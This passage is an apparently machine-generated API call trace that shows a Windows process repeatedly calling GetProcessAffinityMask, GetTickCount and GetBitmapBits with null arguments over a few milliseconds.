lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.498] GetTickCount () returned 0x202921a [0247.498] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.498] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.498] GetTickCount () returned 0x202921a [0247.498] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.498] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.498] GetTickCount () returned 0x202921a [0247.498] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.498] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.498] GetTickCount () returned 0x202921a [0247.498] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.498] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.498] GetTickCount () returned 0x202921a [0247.498] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.498] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.499] GetTickCount () returned 0x202921a [0247.499] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.499] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.499] GetTickCount () returned 0x202921a [0247.499] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.499] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.499] GetTickCount () returned 0x202921a [0247.499] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.499] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.499] GetTickCount () returned 0x202921a [0247.499] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.499] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.499] GetTickCount () returned 0x202921a [0247.499] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.499] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.499] GetTickCount () returned 0x202921a [0247.499] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.500] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.500] GetTickCount () returned 0x202921a [0247.500] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.500] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.500] GetTickCount () returned 0x202921a [0247.500] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.500] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.500] GetTickCount () returned 0x202921a [0247.500] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.500] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.500] GetTickCount () returned 0x202921a [0247.500] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.500] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.500] GetTickCount () returned 0x202921a [0247.500] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.500] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.500] GetTickCount () returned 0x202921a [0247.500] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.500] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.501] GetTickCount () returned 0x202921a [0247.501] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.501] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.501] GetTickCount () returned 0x202921a [0247.501] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.501] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.501] GetTickCount () returned 0x202921a [0247.501] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.501] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.501] GetTickCount () returned 0x202921a [0247.501] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.501] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.501] GetTickCount () returned 0x202921a [0247.501] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.502] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.502] GetTickCount () returned 0x202921a [0247.502] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.502] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.502] GetTickCount () returned 0x202921a [0247.502] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.502] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.502] GetTickCount () returned 0x202921a [0247.502] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.502] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.502] GetTickCount () returned 0x202921a [0247.502] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.502] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.502] GetTickCount () returned 0x202921a [0247.502] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.502] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.502] GetTickCount () returned 0x202921a [0247.502] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.503] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.503] GetTickCount () returned 0x202921a [0247.503] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.503] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.503] GetTickCount () returned 0x202921a [0247.503] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.503] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.503] GetTickCount () returned 0x202921a [0247.503] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.503] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.503] GetTickCount () returned 0x202921a [0247.503] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.503] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.503] GetTickCount () returned 0x202921a [0247.503] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.504] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.504] GetTickCount () returned 0x202921a [0247.504] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.504] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.504] GetTickCount () returned 0x202921a [0247.504] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.504] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.504] GetTickCount () returned 0x202921a [0247.504] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.504] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.504] GetTickCount () returned 0x202921a [0247.504] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.504] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.504] GetTickCount () returned 0x202921a [0247.504] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.504] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.504] GetTickCount () returned 0x202921a [0247.504] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.504] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.505] GetTickCount () returned 0x202921a [0247.505] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.505] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.505] GetTickCount () returned 0x202921a [0247.505] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.505] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.505] GetTickCount () returned 0x202921a [0247.505] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.505] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.505] GetTickCount () returned 0x202921a [0247.505] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.505] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.505] GetTickCount () returned 0x202921a [0247.505] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.506] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.506] GetTickCount () returned 0x202921a [0247.506] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.506] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.506] GetTickCount () returned 0x202921a [0247.506] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.506] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.506] GetTickCount () returned 0x2029229 [0247.506] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.506] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.506] GetTickCount () returned 0x2029229 [0247.506] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.506] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.506] GetTickCount () returned 0x2029229 [0247.506] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.506] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.506] GetTickCount () returned 0x2029229 [0247.507] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.507] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.507] GetTickCount () returned 0x2029229 [0247.507] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.507] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.507] GetTickCount () returned 0x2029229 [0247.507] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.507] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.507] GetTickCount () returned 0x2029229 [0247.507] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.507] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.507] GetTickCount () returned 0x2029229 [0247.507] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.507] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.507] GetTickCount () returned 0x2029229 [0247.507] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.507] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.507] GetTickCount () returned 0x2029229 [0247.508] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.508] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.508] GetTickCount () returned 0x2029229 [0247.508] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.508] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.508] GetTickCount () returned 0x2029229 [0247.508] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.508] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.508] GetTickCount () returned 0x2029229 [0247.508] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.508] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.508] GetTickCount () returned 0x2029229 [0247.508] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.508] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.508] GetTickCount () returned 0x2029229 [0247.508] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.508] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.508] GetTickCount () returned 0x2029229 [0247.508] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.509] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.509] GetTickCount () returned 0x2029229 [0247.509] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.509] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.509] GetTickCount () returned 0x2029229 [0247.509] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.509] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.509] GetTickCount () returned 0x2029229 [0247.509] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.509] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.509] GetTickCount () returned 0x2029229 [0247.509] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.509] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.509] GetTickCount () returned 0x2029229 [0247.509] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.509] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.509] GetTickCount () returned 0x2029229 [0247.509] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.509] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.510] GetTickCount () returned 0x2029229 [0247.510] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.510] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.510] GetTickCount () returned 0x2029229 [0247.510] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.510] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.510] GetTickCount () returned 0x2029229 [0247.510] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.510] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.510] GetTickCount () returned 0x2029229 [0247.510] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.510] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.510] GetTickCount () returned 0x2029229 [0247.510] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.510] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.510] GetTickCount () returned 0x2029229 [0247.510] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.510] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.511] GetTickCount () returned 0x2029229 [0247.511] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.511] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.511] GetTickCount () returned 0x2029229 [0247.511] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.511] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.511] GetTickCount () returned 0x2029229 [0247.511] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.511] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.511] GetTickCount () returned 0x2029229 [0247.511] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.511] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.511] GetTickCount () returned 0x2029229 [0247.511] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.511] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.511] GetTickCount () returned 0x2029229 [0247.512] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.512] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.512] GetTickCount () returned 0x2029229 [0247.512] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.512] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.512] GetTickCount () returned 0x2029229 [0247.512] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.512] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0247.512] GetTickCount () returned 0x2029229 [0247.512] GetBitmapBits (in: hbit=0x0, cb=0, lpvBits=0x0 | out: lpvBits=0x0) returned 0 [0247.512] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, 